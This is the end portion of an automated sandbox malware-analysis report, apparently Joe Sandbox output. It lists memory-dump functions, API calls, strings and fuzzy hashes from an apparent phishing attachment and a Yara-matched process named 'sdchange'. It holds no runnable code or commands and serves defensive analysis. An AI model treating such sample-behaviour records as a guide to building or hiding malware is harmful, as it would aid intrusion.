                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: %%%u$]:%u
                                              • API String ID: 48624451-3050659472
                                              • Opcode ID: 3f927fe8733dd7d91b1936bd3b02138df8504c392379fb06ae14f6eb19c40fad
                                              • Instruction ID: 7e6b220a617f93ee09e964907c2057ad3ef02ac52aac06d87022095afd1c76be
                                              • Opcode Fuzzy Hash: 3f927fe8733dd7d91b1936bd3b02138df8504c392379fb06ae14f6eb19c40fad
                                              • Instruction Fuzzy Hash: 19318676E002199FDB10CF29DD40BEEB7F8EB44750F844596E84AE3240EB30EA558FA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: Wow64 Emulation Layer
                                              • API String ID: 3446177414-921169906
                                              • Opcode ID: 5d00b8e054f094aa0f85c01f56c725a25b0171bf1ecdeca837d93ead4df62e0f
                                              • Instruction ID: dbad4f3ae14264dcc64f2f40ca5cea091ec872280d99d48da5fa77e990fcf1a1
                                              • Opcode Fuzzy Hash: 5d00b8e054f094aa0f85c01f56c725a25b0171bf1ecdeca837d93ead4df62e0f
                                              • Instruction Fuzzy Hash: AA212CB590121DBFAB01AFA0EC84DFF7BBDEF852D8B450464FA21A2100D730DE059B64
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d74ed665cefb89a966fc5e7d56f0eba7ac28ba47dcc632d1d88137c0ce9429c7
                                              • Instruction ID: 1ea0dea65cfa156776375e9be16ebb371df21f4c0e3ad93fb84e9f08933b4bfb
                                              • Opcode Fuzzy Hash: d74ed665cefb89a966fc5e7d56f0eba7ac28ba47dcc632d1d88137c0ce9429c7
                                              • Instruction Fuzzy Hash: B3E1CD75E00748DFDB21CFA9E980A8DBBF5BF48354F244A2AE446EB660D770A941CF10
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 9334a5aab3dbbb468b6ac7cd3795bcfefe1b4d86f4d3d4ac6dab9755b7b6da28
                                              • Instruction ID: c46a2377f83120153a106cb1ec18b3974105c9ee419f0dc3b5288ef7b1beef14
                                              • Opcode Fuzzy Hash: 9334a5aab3dbbb468b6ac7cd3795bcfefe1b4d86f4d3d4ac6dab9755b7b6da28
                                              • Instruction Fuzzy Hash: A3713471E0025ADFDF01CFA8E990ADDBBF5BF48350F58412AE905EB254D734A906CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 507a0ed8384649aa2613f265068e62ca2f5e209c7753383c0a088c5b06580ab3
                                              • Instruction ID: 712a219b4d127983d52fc2fc698744fcd2b01c446af7f4061650549ee1e527e6
                                              • Opcode Fuzzy Hash: 507a0ed8384649aa2613f265068e62ca2f5e209c7753383c0a088c5b06580ab3
                                              • Instruction Fuzzy Hash: 1E518A787026129FEB08CE18C9A4A29B7F5FF8A370B14416DD906DB720DB70EC51EB81
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 1d4dca69e3b5bb351c3ef17652a3cd693713bb9210e6a4d6fde5b12bff7434c7
                                              • Instruction ID: 489553da99fa56c6af91eeaa5e63b7a885fe41da80b6904e72d1b7c4fb36d204
                                              • Opcode Fuzzy Hash: 1d4dca69e3b5bb351c3ef17652a3cd693713bb9210e6a4d6fde5b12bff7434c7
                                              • Instruction Fuzzy Hash: AD5112B6E002199FEF04CFA8E851ADDBBB5BF48354F15822AE805EB650D7349942CF54
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                              • String ID:
                                              • API String ID: 4281723722-0
                                              • Opcode ID: 95f1ea70b76569a12ae27ecb2754ad94982e0665c439be26fc9a88995393f611
                                              • Instruction ID: 0565cedc4f39d7162b9f777302b64b970f663820f7944b41a8ab6eb43f1df0b0
                                              • Opcode Fuzzy Hash: 95f1ea70b76569a12ae27ecb2754ad94982e0665c439be26fc9a88995393f611
                                              • Instruction Fuzzy Hash: 6A3134B6E01228AFDF11EFA8E885A9DBBF1FB48721F10412AE911B7690DB355901CF54
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: d85e5473256b00f87734cdb2317b6ec265f376465788e0113d18162bb2032f49
                                              • Instruction ID: ab309e4347d9a99e9eba7fbb25ae72dc2b74b2b55d46b4d5f2d906a477f68132
                                              • Opcode Fuzzy Hash: d85e5473256b00f87734cdb2317b6ec265f376465788e0113d18162bb2032f49
                                              • Instruction Fuzzy Hash: EB326570D40369DFEB21CF64D884BDDBBB4BB48308F4444E9D549A7681DBB49A88CF90
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: __aulldvrm
                                              • String ID: +$-
                                              • API String ID: 1302938615-2137968064
                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction ID: 176209eb58fb61be802fb78caac599613a13fb2298a8ef84dc911267186006fc
                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                              • Instruction Fuzzy Hash: EF91BA74E003159FEB16CFADE8806AEB7B5FF84761F58451AF865E72C0D7309A40A750
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0$Flst
                                              • API String ID: 0-758220159
                                              • Opcode ID: 7e9213d55a681ab9776734a9a44f268a825c6ac2db62aa62d63747f3da20c7f9
                                              • Instruction ID: 7a3a3658d9e5996df066693a0e0cef229f12b8745ff6328fd317f10c9d8c1729
                                              • Opcode Fuzzy Hash: 7e9213d55a681ab9776734a9a44f268a825c6ac2db62aa62d63747f3da20c7f9
                                              • Instruction Fuzzy Hash: 2151ACB9E00348CFEB15CF99E48469DFBF8EF44395F5A806AD0499B254EB709D85CB80
                                              APIs
                                              Strings
                                              • kLsE, xrefs: 33560540
                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3356063D
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                              • API String ID: 3446177414-2547482624
                                              • Opcode ID: 65bf7d86d6d1a9d3a28469fa2fbd05b04069d5cfe547c8a2f8bf699c6f4394f2
                                              • Instruction ID: 0d130b34d056bb7261a3bc8a6e4ce56d80904fa8fd9fe2d94c831eecf9978e0d
                                              • Opcode Fuzzy Hash: 65bf7d86d6d1a9d3a28469fa2fbd05b04069d5cfe547c8a2f8bf699c6f4394f2
                                              • Instruction Fuzzy Hash: A951E0B65087429FD314DF24E440697B7E8AF84348F04683EE9EA87640E778D545CFD2
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: 0$0
                                              • API String ID: 3446177414-203156872
                                              • Opcode ID: b53fd0b44cd770f88808a53f8f3daf822986ad33332e4f1023f67d33a2d11b3e
                                              • Instruction ID: 17ce2e5063fa6ff46eb4f6bf8a3e4699085d95fada9438206461adbf52bfc6f2
                                              • Opcode Fuzzy Hash: b53fd0b44cd770f88808a53f8f3daf822986ad33332e4f1023f67d33a2d11b3e
                                              • Instruction Fuzzy Hash: 0F418EB2A087069FE300CF28D494A4ABBE4FF88354F04492EF489DB350D771EA05CB96

                                              Execution Graph

                                              Execution Coverage:1.2%
                                              Dynamic/Decrypted Code Coverage:4.6%
                                              Signature Coverage:0%
                                              Total number of Nodes:216
                                              Total number of Limit Nodes:25

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: #$&J$0$4$4$4$$<;$<m$N=$NI$P$SK$Y$c>$d$e$$jB$jG$l$n$sn$u$xs$z^jB$#$~
                                              • API String ID: 0-1260726500
                                              • Opcode ID: fd0e4420c71a061ac1762caaa35ac530deed8dac59a1d8e6791a24b245260991
                                              • Instruction ID: 619b47f402d757c5a94209d8767fc7a1d004c5b0ee63827cdee6b6b71cf385fd
                                              • Opcode Fuzzy Hash: fd0e4420c71a061ac1762caaa35ac530deed8dac59a1d8e6791a24b245260991
                                              • Instruction Fuzzy Hash: 202293B0D04269CBEB24CF46C994BDDBBB1BF44308F1082D9D549AB280DB759AC9DF64

                                              Control-flow Graph

                                              APIs
                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02C7968E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 29d2f3eae3eecdb957aa4a0268a62ce3f47417c7960bc593d27c9860f9b3b426
                                              • Instruction ID: 2ad61e28d250789049778cc727a8dd50369e222da0c44166d96316742e1637ba
                                              • Opcode Fuzzy Hash: 29d2f3eae3eecdb957aa4a0268a62ce3f47417c7960bc593d27c9860f9b3b426
                                              • Instruction Fuzzy Hash: DA31AEB5A01248AFCB14DF98D881EEEB7B9EF8C314F108619F919A7340D770A951CFA5

                                              Control-flow Graph

                                              APIs
                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02C797E3
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 8bc8b28d2847786c78e31c431c3ad13a4c80f281eaa87e5c5c36adec1351f4a1
                                              • Instruction ID: 8a0172694cf9f7eea81deb75ae2aced6a796f250cb3a329561f2daa2e22dac33
                                              • Opcode Fuzzy Hash: 8bc8b28d2847786c78e31c431c3ad13a4c80f281eaa87e5c5c36adec1351f4a1
                                              • Instruction Fuzzy Hash: E931E6B5A00209AFCB14DF98D981EEFB7B9EF88314F008219FD19A7240D770A951CFA5

                                              Control-flow Graph

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(02C620FE,?,02C7838E,00000000,00000004,00003000,?,?,?,?,?,02C7838E,02C620FE,02C7838E,89CC4589,02C620FE), ref: 02C79AD8
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 00116b90dda962f07f70a53560b38c2d7b5eca92cfcef9ae4e0bd317f9c39fc6
                                              • Instruction ID: fe3eb8ff894efb04406937d037da39f07365bf7e69c801767842aa4a682ebe51
                                              • Opcode Fuzzy Hash: 00116b90dda962f07f70a53560b38c2d7b5eca92cfcef9ae4e0bd317f9c39fc6
                                              • Instruction Fuzzy Hash: 592108B5A00209AFDB14DF98D841FAFB7B9EF88310F008119FE19A7240D770A951CFA5

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 2c798a0-2c798dc call 2c514a0 call 2c7aaf0 NtClose
                                              APIs
                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02C798D7
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2970797470.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2c50000_sdchange.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: cd6213df5cb1db09666ab31476bb7559ec7a4f265cb6d7c6312368f982f7f8bd
                                              • Instruction ID: 320621532974492f49160aefbfe28e3272e88fdafaf7e6b67c31bd809ef0eff6
                                              • Opcode Fuzzy Hash: cd6213df5cb1db09666ab31476bb7559ec7a4f265cb6d7c6312368f982f7f8bd
                                              • Instruction Fuzzy Hash: 3DE046322402147BD620EA5ACC40F9B77ADDBC5764F004015FA08A7241CAB1B9418BB4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                              • Instruction ID: 9f8bea8f1d70daa21d8e3516a18f79438732c08dc67093a16ba90f7567088959
                                              • Opcode Fuzzy Hash: 62c631dc8b7a96b2383d4c2c544fbf4b12eb4da6f50761440250741d98972f91
                                              • Instruction Fuzzy Hash: CE90023220140402F100759954486460005CBE0306F55D055B5425556EC666D9926131
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                              • Instruction ID: 579b2acc7a6f4e6c1b50e0b8aeff1702f84d31be1219898c6c4a3104b0263a42
                                              • Opcode Fuzzy Hash: 6c22168b7453dbe8e2616dc4b5a33a8b1f5d516ac122e06ddfcc707dc7e727ba
                                              • Instruction Fuzzy Hash: 9F90023220148802F1107159844474A0005CBD0306F59C455B4825659D8696D9927121
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                              • Instruction ID: 2024d99c43a797471233114891ac649aaf59eabf07304c38615d6564e4d6b22f
                                              • Opcode Fuzzy Hash: 1c8f7ac18fc1b359dc676a7870e90773ada30f0c8ccd04b779b316b6e7df336b
                                              • Instruction Fuzzy Hash: 1E90023220140413F111715945447070009CBD0246F95C456B0825559D9657DA53A121
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                              • Instruction ID: b4568b6d7efd2003d1c94ad24b09464dc575bbff13fdfa87d143de6611dc15b5
                                              • Opcode Fuzzy Hash: 96ebfdead76b8afb84c62a5b7f493457e76f29d7f84a01019e6db7c66a644093
                                              • Instruction Fuzzy Hash: 9B90022A21340002F1807159544860A0005CBD1207F95D459B0416559CC916D96A5321
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                              • Instruction ID: 9073e522700ccb5ef3e230e9433c02f0f91ac53d4513890422ebee1854b5bc11
                                              • Opcode Fuzzy Hash: 8cdf2afe6261208467a5082d62d9a49345a4dbeef5d3ce5a0ea76f03a5dcb415
                                              • Instruction Fuzzy Hash: D2900222211C0042F20075694C54B070005CBD0307F55C159B0555555CC916D9625521
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                              • Instruction ID: e869f75edb9196141ff962fefaeac7c76fd8f74f702ee236f51e07c66858da4d
                                              • Opcode Fuzzy Hash: c23d69e2c18a196a7b6138b39c2d8f4b2c48a301a6d22b9b11a9dacc76267f6e
                                              • Instruction Fuzzy Hash: E690026234140442F10071594454B060005CBE1306F55C059F1465555D861ADD536126

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 320 4bb2ad0-4bb2adc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                              • Instruction ID: 63dd7a7dd45a34edcea541188d50320671919f631b49f9a3e8b4b5a42371b83d
                                              • Opcode Fuzzy Hash: f501a956e576c631e69b1cccaed36f2b205c948b0af1638eb2e2cf90c11779f0
                                              • Instruction Fuzzy Hash: B7900226211400032105B55907445070046CBD5356355C065F1416551CD622D9625121

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 322 4bb2bf0-4bb2bfc LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
                                              • Associated: 00000007.00000002.2972067792.0000000004C69000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004C6D000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.2972067792.0000000004CDE000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_4b40000_sdchange.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                              • Instruction ID: 29b1b5c4cc9ec08c622ab69677b13efb563721dd58366d4715035a020ec2a879
                                              • Opcode Fuzzy Hash: a624d791e8f2f11df80ffacb937cdd8d1891582ce2183e7e3ab2280b58b4fbfd
                                              • Instruction Fuzzy Hash: 4B90023220140802F1807159444464A0005CBD1306F95C059B0426655DCA16DB5A77A1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 321 4bb2b60-4bb2b6c LdrInitializeThunk
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.2972067792.0000000004B40000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B40000, based on PE: true
